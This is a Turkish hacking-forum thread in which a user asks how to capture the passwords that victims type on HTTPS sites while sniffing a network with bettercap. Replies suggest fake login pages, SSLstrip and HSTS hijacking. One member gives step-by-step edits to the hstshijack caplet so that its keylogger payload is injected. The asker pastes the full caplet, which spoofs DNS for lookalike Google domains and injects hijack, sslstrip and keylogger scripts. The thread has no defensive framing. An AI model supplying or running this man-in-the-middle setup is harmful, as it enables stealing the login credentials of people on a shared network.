Ağ dinleme nasıl yapılır ?

BurakOnen21 · 23 Nis 2022

şimdi bettercapta https sitelerde giriş yapılınca şifreleri göremiyoruz ya nasıl görebiliriz veya başka bu tarz hangi araçlar var

AideSuke · 23 Nis 2022

BurakOnen21' Alıntı:
şimdi bettercapta https sitelerde giriş yapılınca şifreleri göremiyoruz ya nasıl görebiliriz veya başka bu tarz hangi araçlar var

bettercap içinde sanırım hsthijack diye bir dosya geliyodu onun ile fake site login i yapıp kurbana yedirebilirsin

'Creactiver · 23 Nis 2022

BurakOnen21' Alıntı:
şimdi bettercapta https sitelerde giriş yapılınca şifreleri göremiyoruz ya nasıl görebiliriz veya başka bu tarz hangi araçlar var

Öncelikle Selamlar, Ağ dinlemek İçin En Çok kullanılan İki Araç ;
Ettercap
Wireshark
Bu Araçların Kullanımını öğrenerek de Başarılı Bir şekikde Ağ Dinleme İşlemlerini gerçekleştirebilirsiniz.

GökBörü. · 24 Nis 2022

BurakOnen21' Alıntı:
şimdi bettercapta https sitelerde giriş yapılınca şifreleri göremiyoruz ya nasıl görebiliriz veya başka bu tarz hangi araçlar var

https siteleri wireshark da göremiyor
bettercap ağ dinleme yanı sıra simüle edebilceğiniz bir tooldur
man in the middle, arp poisoning gibi saldırılar içinde iyi bir tooldur sorun çözülür ise çözüldü olarak işaretleyiniz diğer konuların önüne geçmesin.

AforAnarchy · 27 Nis 2022

HSTS hijac ya da SSLSTRİP bunları kullanırsan adamın mevcut taraycısını http kullanmaya zorlar. Ama her site için çalışmaz yani garantili yöntem dğeil

BurakOnen21 · 27 Nis 2022

AforAnarchy' Alıntı:
HSTS hijac ya da SSLSTRİP bunları kullanırsan adamın mevcut taraycısını http kullanmaya zorlar. Ama her site için çalışmaz yani garantili yöntem dğeil

knk peki bu dediğini nasıl yapıyoruz anlatır mısın

'GHOST · 27 Nis 2022

BurakOnen21' Alıntı:
şimdi bettercapta https sitelerde giriş yapılınca şifreleri göremiyoruz ya nasıl görebiliriz veya başka bu tarz hangi araçlar var

Merhaba değerli forum üyesi BurakOnen21;

https ve hsts olan sitelerde bu islemi gerceklestiremessin ancak local agda dinleme yapıyorsan Bettercap aracındaki hstshijack.cap dosyasını düzenleyerek https i http olarak gösterebilirsin.

mousepad usr/share/bettercap/coplets/hstshijack/hstshijack.cap

diyerek hstshijack.cap dosyasını görüntüle sonrasında

/usr/local/share/bettercap/caplets/hstshijack/sal.log kısmında local kısmını sil

...proxy.script/usr/local/share/bettercap/coplets... diye bir kisim daha var burdada local kismini sil aslinda local yazanların hepsini sil.

...payloads diye bir yer olacak orada sadece *:/usr/share/bettercap.../keylogger.js diye yazan kısım kalsin bunun dışındakileri sil.

....ecode kısmında true yazıyor bunu false ile değiştir.

BurakOnen21 · 27 Nis 2022

The_Dark_Hornet' Alıntı:
Merhaba değerli forum üyesi BurakOnen21;

https ve hsts olan sitelerde bu islemi gerceklestiremessin ancak local agda dinleme yapıyorsan Bettercap aracındaki hstshijack.cap dosyasını düzenleyerek https i http olarak gösterebilirsin.

mousepad usr/share/bettercap/coplets/hstshijack/hstshijack.cap

diyerek hstshijack.cap dosyasını görüntüle sonrasında

/usr/local/share/bettercap/caplets/hstshijack/sal.log kısmında local kısmını sil

...proxy.script/usr/local/share/bettercap/coplets... diye bir kisim daha var burdada local kismini sil aslinda local yazanların hepsini sil.

...payloads diye bir yer olacak orada sadece *:/usr/share/bettercap.../keylogger.js diye yazan kısım kalsin bunun dışındakileri sil.

....ecode kısmında true yazıyor bunu false ile değiştir.

senin dediklierinden farklı olanlar veya olmayanlar var

# Documentation can be found at caplets/hstshijack at master · bettercap/caplets

# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads'
# variables get precendence over those assigned to the 'hstshijack.ignore' variable.
set hstshijack.targets *.google.com, google.com, gstatic.com, *.gstatic.com
set hstshijack.replacements *.google.corn,google.corn,gstatic.corn,*.gstatic.corn
set hstshijack.ssl.domains /usr/local/share/bettercap/caplets/hstshijack/domains.txt
set hstshijack.ssl.index /usr/local/share/bettercap/caplets/hstshijack/index.json
set hstshijack.ssl.check true
#set hstshijack.blockscripts example.com,*.example.com
set hstshijack.obfuscate true
set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js
#set hstshijack.ignore *

set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
http.proxy on

set dns.spoof.domains *.google.corn,google.corn,gstatic.corn,*.gstatic.corn
set dns.spoof.all true
dns.spoof on

bunda hangilerine ne yapmam gerekiyor

'GHOST · 27 Nis 2022

BurakOnen21' Alıntı:
senin dediklierinden farklı olanlar veya olmayanlar var

# Documentation can be found at caplets/hstshijack at master · bettercap/caplets

# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads'
# variables get precendence over those assigned to the 'hstshijack.ignore' variable.
set hstshijack.targets *.google.com, google.com, gstatic.com, *.gstatic.com
set hstshijack.replacements *.google.corn,google.corn,gstatic.corn,*.gstatic.corn
set hstshijack.ssl.domains /usr/local/share/bettercap/caplets/hstshijack/domains.txt
set hstshijack.ssl.index /usr/local/share/bettercap/caplets/hstshijack/index.json
set hstshijack.ssl.check true
#set hstshijack.blockscripts example.com,*.example.com
set hstshijack.obfuscate true
set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js
#set hstshijack.ignore *

set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
http.proxy on

set dns.spoof.domains *.google.corn,google.corn,gstatic.corn,*.gstatic.corn
set dns.spoof.all true
dns.spoof on

bunda hangilerine ne yapmam gerekiyor

Merhaba değerli forum üyesi BurakOnen21;
github reposundaki hstshijack.cap dosyasinda farkliliklar olabilir bunu apt-get install bettercap diyerek linux reposundan indirip sana belirttigim dizin yoluyla hstshijack.cap dosyasini acabilirsin eger ondada aynı şekilde farklılıklar varsa ki olmayacağını sanıyorum olan kısımları düzenleyerek deneyebilirsin.

BurakOnen21 · 27 Nis 2022

The_Dark_Hornet' Alıntı:
Merhaba değerli forum üyesi BurakOnen21;
github reposundaki hstshijack.cap dosyasinda farkliliklar olabilir bunu apt-get install bettercap diyerek linux reposundan indirip sana belirttigim dizin yoluyla hstshijack.cap dosyasini acabilirsin eger ondada aynı şekilde farklılıklar varsa ki olmayacağını sanıyorum olan kısımları düzenleyerek deneyebilirsin.

linux reposu derken tam olarak nereye indirmeliyim

'GHOST · 27 Nis 2022

BurakOnen21' Alıntı:
linux reposu derken tam olarak nereye indirmeliyim

Merhaba değerli forum üyesi BurakOnen21;

terminalde apt-get install bettercap diyerek bettercap i indirebilirsin apt-get ile linux reposunda bulunan bettercap aracını indirmiş oluyorsun.

Ağ dinleme nasıl yapılır ?

BurakOnen21

Üye

AideSuke

Üye

'Creactiver

Üye

GökBörü.

Uzman üye

AforAnarchy

Üye

BurakOnen21

Üye

'GHOST

Uzman üye

BurakOnen21

Üye

'GHOST

Uzman üye

BurakOnen21

Üye

'GHOST

Uzman üye

Sosyal medya sayfalarımız